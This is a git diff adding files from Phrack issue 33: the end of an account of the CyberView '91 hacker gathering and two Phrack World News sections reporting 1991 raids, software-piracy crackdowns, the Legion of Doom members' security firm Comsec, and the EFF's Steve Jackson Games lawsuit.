+"hackers" had built the entire personal computer industry.  Jobs was a hacker,
+Wozniak too, even Bill Gates, the youngest billionaire in the history of
+America -- all "hackers."  The new buttoned-down regime at Apple had blown its
+top, and as for the feds, they were willing, but clueless.  Well, let's be
+charitable -- the feds were "cluefully challenged."  "Clue-impaired."
+"Differently clued...."
+
+     Back in the 70s (as Kapor recited to the hushed and respectful young
+hackers) he himself had practiced "software piracy" -- as those activities
+would be known today.  Of course, back then, "computer software" hadn't been a
+major industry -- but today, "hackers" had police after them for doing things
+that the industry's own pioneers had pulled routinely.  Kapor was irate about
+this.  His own personal history, the lifestyle of his pioneering youth, was
+being smugly written out of the historical record by the latter-day corporate
+androids.  Why, nowadays, people even blanched when Kapor forthrightly declared
+that he'd done LSD in the Sixties.
+
+     Quite a few of the younger hackers grew alarmed at this admission of
+Kapor's, and gazed at him in wonder, as if expecting him to explode.
+
+     "The law only has sledgehammers, when what we need are parking tickets and
+speeding tickets," Kapor said.  Anti-hacker hysteria had gripped the nation in
+1990.  Huge law enforcement efforts had been mounted against illusory threats.
+In Washington DC, on the very day when the formation of the Electronic Frontier
+Foundation had been announced, a Congressional committee had been formally
+presented with the plotline of a thriller movie -- DIE HARD II, in which hacker
+terrorists seize an airport computer -- as if this Hollywood fantasy posed a
+clear and present danger to the American republic.  A similar hacker thriller,
+WAR GAMES, had been presented to Congress in the mid-80s.  Hysteria served no
+one's purposes, and created a stampede of foolish and unenforceable laws likely
+to do more harm than good.
+
+     Kapor didn't want to "paper over the differences" between his Foundation
+and the underground community.  In the firm opinion of EFF, intruding into
+computers by stealth was morally wrong.  Like stealing phone service, it
+deserved punishment.  Not draconian ruthlessness, though.  Not the ruination of
+a youngster's entire life.
+
+     After a lively and quite serious discussion of digital free-speech issues,
+the entire crew went to dinner at an Italian eatery in the local mall, on
+Kapor's capacious charge-tab.  Having said his piece and listened with care,
+Kapor began glancing at his watch.  Back in Boston, his six-year-old son was
+waiting at home, with a new Macintosh computer-game to tackle.  A quick
+phone-call got the jet warmed up, and Kapor and his lawyer split town.
+
+     With the forces of conventionality -- such as they were -- out of the
+picture, the Legion of Doom began to get heavily into "Mexican Flags."  A
+Mexican Flag is a lethal, multi-layer concoction of red grenadine, white
+tequila and green creme-de-menthe.  It is topped with a thin layer of 150 proof
+rum, set afire, and sucked up through straws.
+
+     The formal fire-and-straw ritual soon went by the board as things began to
+disintegrate.  Wandering from room to room, the crowd became howlingly rowdy,
+though without creating trouble, as the CyberView crowd had wisely taken over
+an entire wing of the hotel.
+
+     "Crimson Death," a cheerful, baby-faced young hardware expert with a
+pierced nose and three earrings, attempted to hack the hotel's private phone
+system, but only succeeded in cutting off phone service to his own room.
+
+     Somebody announced there was a cop guarding the next wing of the hotel.
+Mild panic ensued.  Drunken hackers crowded to the window.
+
+     A gentleman slipped quietly through the door of the next wing wearing a
+short terrycloth bathrobe and spangled silk boxer shorts.
+
+     Spouse-swappers had taken over the neighboring wing of the hotel, and were
+holding a private weekend orgy.  It was a St Louis swingers' group.  It turned
+out that the cop guarding the entrance way was an off-duty swinging cop.  He'd
+angrily threatened to clobber Doc Holiday.  Another swinger almost punched-out
+"Bill from RNOC," whose prurient hacker curiosity, naturally, knew no bounds.
+
+     It was not much of a contest.  As the weekend wore on and the booze flowed
+freely, the hackers slowly but thoroughly infiltrated the hapless swingers, who
+proved surprisingly open and tolerant.  At one point, they even invited a group
+of hackers to join in their revels, though "they had to bring their own women."
+
+     Despite the pulverizing effects of numerous Mexican Flags, Comsec Data
+Security seemed to be having very little trouble on that score.  They'd
+vanished downtown brandishing their full-color photo in TIME magazine, and
+returned with an impressive depth-core sample of St Louis womanhood, one of
+whom, in an idle moment, broke into Doc Holiday's room, emptied his wallet, and
+stole his Sony tape recorder and all his shirts.
+
+     Events stopped dead for the season's final episode of STAR TREK:  THE NEXT
+GENERATION.  The show passed in rapt attention -- then it was back to harassing
+the swingers.  Bill from RNOC cunningly out-waited the swinger guards,
+infiltrated the building, and decorated all the closed doors with globs of
+mustard from a pump-bottle.
+
+     In the hungover glare of Sunday morning, a hacker proudly showed me a
+large handlettered placard reading PRIVATE -- STOP, which he had stolen from
+the unlucky swingers on his way out of their wing.  Somehow, he had managed to
+work his way into the building, and had suavely ingratiated himself into a
+bedroom, where he had engaged a swinging airline ticket-agent in a long and
+most informative conversation about the security of airport computer terminals.
+The ticket agent's wife, at the time, was sprawled on the bed engaging in
+desultory oral sex with a third gentleman.  It transpired that she herself did
+a lot of work on LOTUS 1-2-3.  She was thrilled to hear that the program's
+inventor, Mitch Kapor, had been in that very hotel, that very weekend.
+
+     Mitch Kapor.  Right over there?  Here in St Louis?  Wow.
+
+Isn't life strange.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                           CyberView '91 Guest List
+                           ~~~~~~~~~~~~~~~~~~~~~~~~
+Those known best by handles:                                    Those not:
+
+Bill From RNOC / Circuit / The Conflict / Dead Lord             Dorothy Denning
+Dispater / Doc Holiday / Dr. Williams / Cheap Shades            Michael Godwin
+Crimson Death / Erik Bloodaxe / Forest Ranger / Gomez           Brad Hicks
+Jester Sluggo / J.R. "Bob" Dobbs / Knight Lightning             Mitch Kapor
+Malefactor / Mr. Fido / Ninja Master / Pain Hertz               Bruce Sterling
+Phantom Phreaker / Predat0r / Psychotic Surfer of C&P
+Racer X / Rambone / The Renegade / Seth 2600 / Taran King
+Tuc <Tuc gets his own line just because he is cool!>
+_______________________________________________________________________________
diff --git a/phrack33/11.txt b/phrack33/11.txt
new file mode 100644
index 0000000..bd32e0b
--- /dev/null
+++ b/phrack33/11.txt
@@ -0,0 +1,293 @@
+                               ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 11 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue XXXIII / Part One           PWN
+              PWN                                             PWN
+              PWN          Compiled by Crimson Death          PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Sir Hackalot Raided By Georgia State Police
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+      "They were pretty pissed because they didn't find anything on me."
+
+     Those were Sir Hackalot's remarks to Crimson Death shortly after his run
+in with the authorities.  Sir Hackalot was raided by Georgia State Police in
+connection with Computer Fraud.  The odd thing about it is that Sir Hackalot
+has been inactive for over a year and no real evidence was shown against him.
+They just came in and took his equipment.  Although Sir Hackalot was not not
+arrested, he was questioned about three other locals bbs users who later found
+themselves receiving a visit the same day.  Sir Hackalot is currently waiting
+for his equipment to be returned.
+
+     Could this recent raid have anything to do with the infamous seizure of
+Jolnet Public Access Unix from Lockport, Illinois in connection with the Phrack
+E911 case?  Sir Hackalot was a user on the system and in the mindset of today's
+law enforcement community, that may well be enough for them to justify their
+recent incursion of SH's civil rights.
+_______________________________________________________________________________
+
+Square Deal for Cable Pirates
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by David Hartshorn
+
+     National Programming Service has signed an agreement with 12 programmers
+representing 18 channel for an early conversion package for consumers with
+illegally modified VideoCipher II modules.  The deal will be offered only to
+customers who convert their modified VideoCipher II modules to VC II Plus
+Consumer Security Protection Program (CSPP) modules.  The program will be an
+option to NPS' current five-service minimum purchase required for conversion
+customers.
+
+     Participating programmers have agreed to offer complimentary programming
+through the end of 1991 for conversion customers.  To qualify, customers must
+buy an annual subscription which will start on January 1, 1992 and run though
+December 31, 1992.  Any additional programming customers want to buy will start
+on the day they convert and will run for 12 consecutive months.
+
+     NPS president Mike Schroeder said the objective of the program is to get
+people paying legally for programming from the ranks of those who are not.  If
+a customer keeps his modified unit, he will be spending at least $600 for a new
+module in late 1992, plus programming, when he will be forced to convert due to
+a loss of audio in his modified unit.  If a customer converts now to a VC II
+Plus with MOM (Videopal), then the net effective cost to the customer will be
+only $289.55 (figuring a $105 programming credit from Videopal and about $90
+complimentary programming).
+
+     Included in the deal are ABC, A&E, Bravo, CBS, Discovery Channel, Family
+Channel, NBC, Lifetime, Prime Network, PrimeTime 24, TNN, USA Network, WPIX,
+WSBK, and WWOR.  The package will retail for $179.99.
+
+                            Details:  (800)444-3474
+_______________________________________________________________________________
+
+Clark Development Systems Gets Tough
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Crimson Death (Sysop of Free Speech BBS)
+
+     Most of you have heard of PC-Board BBS software, but what you may not have
+heard is what Clark Development Systems are trying to do with people running
+illegal copies of his software.  The Following messages appeared on Salt Air
+BBS, which is the support BBS for PC-Board registered owners.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Date: 08-19-91 (11:21)              Number: 88016 of 88042
+  To: ALL                           Refer#: NONE
+>From: FRED CLARK                      Read: HAS REPLIES
+Subj: WARNING                       Status: PUBLIC MESSAGE
+Conf: SUPPORT (1)                Read Type: GENERAL (A) (+)
+
+**********************************  WARNING  **********************************
+
+Due to the extent and nature of a number of pirate PCBoard systems which have
+been identified around the US and Canada, we are now working closely with
+several other software manufacturers through the SPA (Software Publisher's
+Association) in order to prosecute these people.  Rather than attempting to
+prosecute them solely through our office and attorney here in Salt Lake, we
+will now be taking advantage of the extensive legal resources of the SPA to
+investigate and shut down these systems.  Since a single copyright violation
+will be prosecuted to the full extent of $50,000 per infringement, a number of
+these pirates are in for a big surprise when the FBI comes knocking on their
+door.  Please note that the SPA works closely with the FBI in the prosecution
+of these individuals since their crimes are involved with trafficking over
+state lines.
+
+The SPA is now working closely with us and the information we have concerning
+the illegal distribution of our and other software publisher's wares.  Please
+do not allow yourself to become involved with these people as you may also be
+brought into any suits and judgements won against them.
+
+We are providing this information as reference only and are not pointing a
+finger at any one specific person or persons who are accessing this system.
+This message may be freely distributed.
+
+Fred Clark
+President
+Clark Development Company, Inc.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Date: 08-19-91 (08:28)              Number: 47213 of 47308
+To: AL LAWRENCE                   Refer#: NONE
+>From: DAVID TERRY                     Read: NO
+Subj: BETA CODE IS NOW OFFLINE      Status: RECEIVER ONLY
+
+
+PLEASE NOTE!      (This message is addressed to ALL!)
+
+The beta code is now offline and may be offline for a couple of days. After
+finding a program which cracks PCBoard's registration code I have taken the
+beta code offline so that I can finish up work on the other routines I've been
+working on which will not be cracked so easily.  I'm sorry if the removal
+inconveniences anyone.  However, it's quite obvious that SOMEONE HERE leaked
+the beta code to a hacker otherwise the hacker could not have worked on
+breaking the registration code.
+
+I'm sorry that the few inconsiderates have to make life difficult for the rest
+of you (and us).  If that's the way the game is played, so be it.
+
+P.S. -- We've found a couple of large pirate boards (who we have not notified)
+        who should expect to see the FBI show up on their doorstep in the not
+        too distant future.  Pass the word along.  If people want to play rough
+        then we'll up the ante a bit ... getting out of jail won't be cheap!
+-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
+
+     Seems to me they are trying to scare everyone.  I think the FBI has
+better things to do than go around catching System Operators who didn't
+purchase PC-Board.  At least I hope they do.  First they put in a key that was
+needed to run the beta version of PCB and you could only get it by typing
+REGISTER on Salt Air, it would then encrypt your name and give you the key so
+you could register you beta.  Expiration date were also implemented into the
+beta code of 14.5a,  but the first day this was released on Salt Air, pirates
+already designed a program to make your own key with any name you wanted.  It
+appears that with this "new" technique that Clark Systems are trying failed
+too.  As it is cracked already also.  Maybe they should be more concerned on
+how PC-Board functions as a BBS rather than how to make it crack-proof.  As
+most pirate system don't run PC-Board anyway!
+_______________________________________________________________________________
+
+Georgia's New Area Code
+~~~~~~~~~~~~~~~~~~~~~~~
+     Telephone use in Georgia has increased so rapidly -- caused by increased
+population and the use of services like fax machines and mobile telephones that
+they are running out of telephone numbers.
+
+     Southern <Fascist> Bell will establish a new area code -- 706 -- in
+Georgia in May 1992.  The territory currently designated by the 404 area code
+will be split.
+
+     Customers in the Atlanta Metropolitan local calling area will continue to
+use the 404 area code.  Customers outside the Atlanta Metropolitan toll free
+calling area will use the 706 area code.  The 912 area code (South Georgia)
+will not be affected by this change.
+
+     They realize the transition to a new area code will take some getting used
+to.  So, between May 3, 1992 and August 2, 1992, you can dial EITHER 706 or 404
+to reach numbers in the new area.  After August 2, 1992, the use of the 706
+area code is required.
+
+     They announced the the new area code far in advance to allow customers to
+plan for the change.
+_______________________________________________________________________________
+
+Unplug                                                            July 20, 1991
+~~~~~~
+>From AT&T Newsbriefs (and contributing sources; the San Francisco Chronicle
+     (7/20/91, A5) and the Dallas Times Herald (7/20/91, A20)
+
+     A prankster who intercepted and rerouted confidential telephone messages
+from voice mail machines in City Hall <of Houston, Texas> prompted officials to
+pull the plug on the phone system.  The city purchased the high-tech telephone
+system in 1986 for $28 million.  But officials forget to require each worker to
+use a password that allows only that worker to retrieve or transfer voice
+messages from their "phone mailboxes," said AT&T spokesman Virgil Wildey.  As a
+result, Wildey said, someone who understands the system can transfer messages
+around, creating chaos.
+_______________________________________________________________________________
+
+The Bust For Red October
+~~~~~~~~~~~~~~~~~~~~~~~~
+By Stickman, Luis Cipher, Orion, Haywire, Sledge, and Kafka Kierkegaard
+
+     At 8:00 AM on August 7, 1991 in Walnut Creek, California the house of
+Steven Merenko, alias Captain Ramius, was raided by Novell attorneys
+occompanied by five federal marshals.  All of his computer equipment was
+confiscated by the Novell attorneys; including disks, tape backups, and all
+hardware.
+
+     Novell officials had filed an affidavit in the United States District
+Court for the Northern District of California.  They charge Merenko had
+illegally distributing Novell NetWare files.
+
+     A Novell investigator logged on to Merenko's BBS as a regular user 11
+times over a period of a several months.  He uploaded a piece of commercial
+software from another company, with the company's permission, in order to gain
+credibility and eventually download a file part of Novell NetWare 386 v3.11,
+which with a full-blown installation costs more than $10,000.
+
+     Novell issued a Civil suit against The Red October BBS, and because of
+that Merenko will not go to jail if he is found guilty of letting other people
+download any copyrighted or commercial software.  The maximum penalty in a
+civil case as this one is $100,000 per work infringed.
+
+     The Red October BBS was THG/TSAN/NapE Site with four nodes, 4 gigabytes of
+hard drive space online and had been running for four years.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Novell's Anti-Piracy Rampage
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     Novell's raid on the Red October BBS on August 7, 1991 is the latest in a
+two-year ongoing anti-piracy venture.  In the same week as the Red October
+bust, the original Wishlist BBS in Redondo Beach, California was also raided.
+Last April (1991), Novell sued seven resellers in five states that were accused
+of illegally selling NetWare.  In the fall of last year they seized the
+computer equipment of two men in Tennessee accused of reselling NetWare over
+BBSs.  According to David Bradford, senior vice president and general counsel
+at Novell and chairman of the Copyright Protection Fund of the Software
+Publisher's Association, the crackdown on software piracy has paid off.
+_______________________________________________________________________________
+
+Lottery May Use Nintendo As Another Way To Play               September 1, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from Minneapolis Star Tribune (Section B)
+
+                  "Several kinks have yet to be worked out."
+
+     Minnesota gamblers soon could be winning jackpots as early as 1993 from
+the comfort of their own living rooms.  The state will begin testing a new
+system next summer that will allow gamblers to pick numbers and buy tickets at
+home by using a Nintendo control deck.  The system, to be created by the state
+and Control Data Corporation, would be somewhat similar to banking with an
+automated teller machine card.  Gamblers would use a Nintendo control deck and
+a state lottery cartridge.  The cartridge would be connected by phone to the
+lottery's computer system, allowing players to pick Lotto America, Daily 3 and
+Gopher 5 numbers, and play the instant cash games.  Players would gain access
+to the system by punching in personal security codes or passwords. Incorrect
+passwords would be rejected.  Only adults would be allowed to play.
+
+     A number of kinks, including setting up a pay-in-advance system for
+players to draw on, computer security and adult registration, must be worked
+out.  32% of Minnesota households have Nintendo units.  About half of those who
+use the units are older than 18.  Those chosen to participate in the summer
+experiment will be given a Nintendo control deck, phone modem and lottery
+cartridge.
+_______________________________________________________________________________
+
+15,000 Cuckoo Letters                                         September 8, 1991
+~~~~~~~~~~~~~~~~~~~~~
+Reprinted from RISKS Digest
+>From:  Cliff Stoll
+
+     In 1989, I wrote, "The Cuckoo's Egg", the true story of how we tracked
+down a computer intruder.  Figuring that a few people might wish to communicate
+with me, I included my e-mail address in the book's forward.
+
+     To my astonishment, it became a bestseller and I've received a tidal wave
+of e-mail.  In 2 years, about 15,000 letters have arrived over four networks
+(Internet, Genie, Compuserve, and AOL).  This suggests that about 1 to 3
+percent of readers send e-mail.
+
+     I've been amazed at the diversity of the questions and comments: ranging
+from comments on my use of "hacker" to improved chocolate chip cookie recipes.
+Surprisingly, very few flames and insulting letters arrived - a few dozen or
+so.
+
+     I've tried to answer each letter individually; lately I've created a few
+macros to answer the most common questions.  About 5% of my replies bounce, I
+wonder how many people don't get through.
+
+     I'm happy to hear from people; it's a gas to realize how far the book's
+reached (letters from Moscow, the South Pole, Finland, Japan, even Berkeley);
+but I'm going to spend more time doing astronomy and less time answering mail.
+
+Cheers,     Cliff Stoll      cliff@cfa.harvard.edu
+                             stoll@ocf.berkeley.edu
+_______________________________________________________________________________
diff --git a/phrack33/12.txt b/phrack33/12.txt
new file mode 100644
index 0000000..228bb53
--- /dev/null
+++ b/phrack33/12.txt
@@ -0,0 +1,448 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 12 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue XXXIII / Part Two           PWN
+              PWN                                             PWN
+              PWN            Compiled by Dispater             PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Legion of Doom Goes Corporate
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     The following is a compilation of several articles from by Michael
+Alexander of ComputerWorld Magazine about Comsec Data Security, Inc.
+
+Comsec Data Security, Inc.
+
+Chris Goggans  a/k/a Erik Bloodaxe                        60 Braeswood Square
+Scott Chasin   a/k/a Doc Holiday                          Houston, Texas  77096
+Kenyon Shulman a/k/a Malefactor                           (713)721-6500
+Robert Cupps - Not a former computer hacker               (713)721-6579 FAX
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Hackers Promote Better Image                           (Page 124) June 24, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     HOUSTON -- Three self-professed members of the Legion of Doom, one of the
+most notorious computer hacker groups to operate in the United States, said
+they now want to get paid for their skills.  Along with a former securities
+trader, the members launched a computer security firm called Comsec Data
+Security that will show corporations how to keep hackers out.
+
+     "We have been in the computer security business for the last 11 years --
+just on the different end of the stick," said Scott Chasin who said he once
+used the handle Doc Holiday as a Legion of Doom member.  The group has been
+defunct since late last year, Chasin said.
+
+     The start-up firm plans to offer systems penetration testing, auditing,
+and training services as well as security products.  "We have information that
+you can't buy in bookstores:  We know why hackers hack, what motivates them,
+why they are curious," Chasin said.
+
+     Already, the start-up has met with considerable skepticism.
+
+     "Would I hire a safecracker to be a security guy at my bank?" asked John
+Blackley, information security administrator at Capitol Holding Corporation in
+Louisville, Kentucky.  "If they stayed straight for 5 to 10 years, I might
+reconsider, but 12 to 18 months ago, they were hackers, and now they have to
+prove themselves."
+
+     "You don't hire ne'er-do-wells to come and look at your system," said Tom
+Peletier, an information security specialist at General Motors Corporation.
+"The Legion of Doom is a known anti-establishment group, and although it is
+good to see they have a capitalist bent, GM would not hire these people."
+
+     Comsec already has three contracts with Fortune 500 firms, Chasin said.
+
+     "I like their approach, and I am assuming they are legit," said Norman
+Sutton, a security consultant at Leemah Datacom Corporation in Hayward,
+California.  His firm is close to signing a distribution pact with Comsec,
+Sutton said.
+
+     Federal law enforcers have described the Legion of Doom in indictments,
+search warrants, and other documents as a closely knit group of about 15
+computer hackers whose members rerouted calls, stole and altered data and
+disrupted telephone service by entering telephone switches, among other
+activities.
+
+     The group was founded in 1984 and has had dozens of members pass through
+its ranks.  Approximately 12 former members have been arrested for computer
+hacking-related crimes; three former members are now serving jail sentences;
+and at least three others are under investigation.  None of the Comsec founders
+have been charged with a computer-related crime.
+
+(Article includes a color photograph of all four founding members of Comsec)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+An Offer You Could Refuse?                               (Page 82) July 1, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+     Tom Peletier, an information security specialist at General Motors in
+Detroit, says he would never hire Comsec Data Security, a security consulting
+firm launched by three ex-members of the Legion of Doom.  "You don't bring in
+an unknown commodity and give them the keys to the kingdom," Peletier said.
+Chris Goggans, one of Comsec's founders, retorted:  "We don't have the keys to
+their kingdom, but I know at least four people off the top of my head that do."
+Comsec said it will do a free system penetration for GM just to prove the
+security firm's sincerity, Goggans said.  "All they have to do is sign a
+release form saying they won't prosecute."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Group Dupes Security Experts                            (Page 16) July 29, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+    "Houston-Based Comsec Fools Consultants To Gather Security Information"
+
+     HOUSTON -- Computer security consultants are supposed to know better, but
+at least six experts acknowledged last week that they were conned.  The
+consultants said they were the victims of a bit of social engineering by Comsec
+Data Security, Inc., a security consulting firm recently launched.
+
+     Comsec masqueraded as a prospective customer using the name of Landmark
+Graphics Corporation, a large Houston-area software publisher, to gather
+information on how to prepare business proposals and conduct security audits
+and other security industry business techniques, the consultants said.
+
+     Three of Comsec's four founders are self-professed former members of the
+Legion of Doom, one of the nation's most notorious hacker groups, according to
+law enforcers.
+
+     "In their press release, they say, 'Our firm has taken a unique approach
+to its sales strategy,'" said one consultant who requested anonymity, citing
+professional embarrassment.  "Well, social engineering is certainly a unique
+sales strategy."
+
+     Social engineering is a technique commonly used by hackers to gather
+information from helpful, but unsuspecting employees that may be used to
+penetrate a computer system.
+
+     "They are young kids that don't know their thumbs from third base about
+doing business, and they are trying to glean that from everybody else," said
+Randy March, director of consulting at Computer Security Consultants, Inc., in
+Ridgefield, Connecticut.
+
+     The consultants said gathering information by posing as a prospective
+customer is a common ploy, but that Comsec violated accepted business ethics by
+posing as an actual company.
+
+     "It is a pretty significant breech of business ethics to make the
+misrepresentation that they did," said Hardie Morgan, chief financial officer
+at Landmark Graphics.  "They may not be hacking anymore, but they haven't
+changed the way they operate."
+
+     Morgan said his firm had received seven or eight calls from security
+consultants who were following up on information they had sent to "Karl
+Stevens," supposedly a company vice president.
+
+SAME OLD STORY
+
+     The consultants all told Morgan the same tale:  They had been contacted by
+"Stevens," who said he was preparing to conduct a security audit and needed
+information to sell the idea to upper management.  "Stevens" had asked the
+consultants to prepare a detailed proposal outlining the steps of a security
+audit, pricing and other information.
+
+     The consultants had then been instructed to send the information by
+overnight mail to a Houston address that later proved to be the home of two of
+Comsec's founders.  In some instances, the caller had left a telephone number
+that when called was found to be a constantly busy telephone company test
+number.
+
+     Morgan said "Stevens" had an intimate knowledge of the company's computer
+systems that is known only to a handful of employees.  While there is no
+evidence that the company's systems were penetrated by outsiders, Landmark is
+"battering down its security hatches," Morgan said.
+
+     Posing as a prospective customer is not an uncommon way to gather
+competitive information, said Chris Goggans, one of Comsec's founders, who once
+used the handle of Erik Bloodaxe.
+
+     "Had we not been who we are, it would be a matter of no consequence,"
+Goggans said.
+
+     "They confirm definitely that they called some of their competitors," said
+Michael Cash, an attorney representing Comsec.  "The fact they used Landmark
+Graphics was an error on their part, but it was the first name that popped into
+their heads.  They did not infiltrate Landmark Graphics in any way."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+"LEGION OF DOOM--INTERNET WORLD TOUR" T-SHIRTS!
+
+     Now you too can own an official Legion of Doom T-shirt.  This is the same
+shirt that sold-out rapidly at the "Cyberview" hackers conference in St. Louis.
+Join the other proud owners such as award-winning author Bruce Sterling by
+adding this collector's item to your wardrobe.  This professionally made, 100
+percent cotton shirt is printed on both front and back.  The front displays
+"Legion of Doom Internet World Tour" as well as a sword and telephone
+intersecting the planet earth, skull-and-crossbones style.  The back displays
+the words "Hacking for Jesus" as well as a substantial list of "tour-stops"
+(internet sites) and a quote from Aleister Crowley.  This T-shirt is sold only
+as a novelty item, and is in no way attempting to glorify computer crime.
+
+Shirts are only $15.00, postage included!  Overseas add an additional $5.00.
+Send check or money-order (No CODs, cash or credit cards--even if it's really
+your card :-) made payable to Chris Goggans to:
+
+                   Chris Goggans
+                   5300 N. Braeswood #4
+                   Suite 181
+                   Houston, TX 77096
+_______________________________________________________________________________
+
+                Steve Jackson Games v. United States of America
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+             Articles reprinted from Effector Online 1.04 and 1.08
+                         May 1, 1991 / August 24, 1991
+
+              "Extending the Constitution to American Cyberspace"
+
+     To establish constitutional protection for electronic media and to obtain
+redress for an unlawful search, seizure, and prior restraint on publication,
+Steve Jackson Games and the Electronic Frontier Foundation filed a civil suit
+against the United States Secret Service and others.
+
+     On March 1, 1990, the United States Secret Service nearly destroyed Steve
+Jackson Games (SJG), an award-winning publishing business in Austin, Texas.
+
+     In an early morning raid with an unlawful and unconstitutional warrant,
+agents of the Secret Service conducted a search of the SJG office.  When they
+left they took a manuscript being prepared for publication, private electronic
+mail, and several computers, including the hardware and software of the SJG
+Computer Bulletin Board System.  Yet Jackson and his business were not only
+innocent of any crime, but never suspects in the first place.  The raid had
+"been staged on the unfounded suspicion that somewhere in Jackson's office
+there "might be" a document compromising the security of the 911 telephone
+system.
+
+     In the months that followed, Jackson saw the business he had built up over
+many years dragged to the edge of bankruptcy.  SJG was a successful and
+prestigious publisher of books and other materials used in adventure
+role-playing games. Jackson also operated a computer bulletin board system
+(BBS) to communicate with his customers and writers and obtain feedback and
+suggestions on new gaming ideas.  The bulletin board was also the repository of
+private electronic mail belonging to several of its users.  This private mail
+was seized in the raid.  Despite repeated requests for the return of his
+manuscripts and equipment, the Secret Service has refused to comply fully.
+
+     More than a year after that raid, the Electronic Frontier Foundation,
+acting with SJG owner Steve Jackson, has filed a precedent setting civil suit
+against the United States Secret Service, Secret Service Agents Timothy Foley
+and Barbara Golden, Assistant United States Attorney William Cook, and Henry
+Kluepfel.
+
+     "This is the most important case brought to date," said EFF general
+counsel Mike Godwin, "to vindicate the Constitutional rights of the users of
+computer-based communications technology.  It will establish the Constitutional
+dimension of electronic expression.  It also will be one of the first cases
+that invokes the Electronic Communications Privacy Act as a shield and not as a
+sword -- an act that guarantees users of this digital medium the same privacy
+protections enjoyed by those who use the telephone and the U.S. Mail."
+
+     Commenting on the overall role of the Electronic Frontier Foundation in
+this case and other matters, EFF's president Mitch Kapor said, "We have been
+acting as an organization interested in defending the wrongly accused.  But the
+Electronic Frontier Foundation is also going to be active in establishing
+broader principles.  We begin with this case, where the issues are clear.  But
+behind this specific action, the EFF also believes that it is vital that
+government, private entities, and individuals who have violated the
+Constitutional rights of individuals be held accountable for their actions.  We
+also hope this case will help demystify the world of computer users to the
+general public and inform them about the potential of computer communities."
+
+     Representing Steve Jackson and the Electronic Frontier Foundation in this
+suit are Harvey A. Silverglate and Sharon L. Beckman of Silverglate & Good of
+Boston; Eric Lieberman and Nick Poser of Rabinowitz, Boudin, Standard, Krinsky
+& Lieberman of New York; and James George, Jr. of Graves, Dougherty, Hearon &
+Moody of Austin, Texas.
+
+     Copies of the complaint, the unlawful search warrant, statements by Steve
+Jackson and the Electronic Frontier Foundation, a legal fact sheet and other
+pertinent materials are available by request from the EFF.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     Also made available to members of the press and electronic media on
+request were the following statement by Mitchell Kapor and a legal fact sheet
+prepared by Sharon Beckman and Harvey Silverglate of Silverglate & Good, the
+law firm central to the filing of this lawsuit.
+
+                  "Why the Electronic Frontier Foundation Is
+                   Bringing Suit On Behalf of Steve Jackson"
+
+     With this case, the Electronic Frontier Foundation begins a new phase of
+affirmative legal action.  We intend to fight for broad Constitutional
+protection for operators and users of computer bulletin boards.
+
+     It is essential to establish the principle that computer bulletin boards
+and computer conferencing systems are entitled to the same First Amendment
+rights enjoyed by other media.  It is also critical to establish that operators
+of bulletin boards -- whether individuals or businesses -- are not subject to
+unconstitutional, overbroad searches and seizures of any of the contents of
+their systems, including electronic mail.
+
+     The Electronic Frontier Foundation also believes that it is vital to hold
+government, private entities, and individuals who have violated the
+Constitutional rights of others accountable for their actions.
+
+           Mitchell Kapor,
+           President, The Electronic Frontier Foundation
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+"Legal Fact Sheet:  Steve Jackson Games v. United States Secret Service, et al"
+
+     This lawsuit seeks to vindicate the rights of a small, successful
+entrepreneur/publisher to conduct its entirely lawful business, free of
+unjustified governmental interference.  It is also the goal of this litigation
+to firmly establish the principle that lawful activities carried out with the
+aid of computer technology, including computer communications and publishing,
+are entitled to the same constitutional protections that have long been
+accorded to the print medium. Computers and modems, no less than printing
+presses, typewriters, the mail, and telephones -being the methods selected by
+Americans to communicate with one another -- are all protected by our
+constitutional rights.
+
+Factual Background and Parties:
+
+     Steve Jackson, of Austin, Texas, is a successful small businessman.  His
+company, Steve Jackson Games, is an award- winning publisher of adventure games
+and related books and magazines.  In addition to its books and magazines, SJG
+operates an electronic bulletin board system (the Illuminati BBS) for its
+customers and for others interested in adventure games and related literary
+genres.
+
+     Also named as plaintiffs are various users of the Illuminati BBS.  The
+professional interests of these users range from writing to computer
+technology.
+
